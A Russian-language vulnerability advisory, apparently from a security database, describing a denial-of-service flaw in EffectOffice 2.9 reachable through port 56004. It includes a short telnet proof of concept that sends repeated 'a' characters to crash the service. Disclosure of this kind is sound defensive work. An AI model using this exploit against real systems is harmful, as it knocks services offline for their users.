DoS против EffectOffice

Дата публикации:
21.11.2003
Дата изменения:
17.10.2006
Всего просмотров:
942
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: EffectOffice 2.9

Описание: Уязвимость обнаружена в программе электронного документооборота EffectOffice. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

Удаленный атакующий может послать специально сформированный запрос к 56004 порту, чтобы аварийно завершить работу программы. Возможно уязвимость может эксплуатироваться для выполнения произвольного кода на уязвимой системе.

Пример/Эксплоит:

hacker# telnet
telnet> open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa

^]
telnet>close
telnet>quit
hacker#
…………
Crash service

URL производителя: http://www.effectoffice.com/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к уязвимым портам только доверенным пользователям.

Уязвимость обнаружил D_BuG

или введите имя

CAPTCHA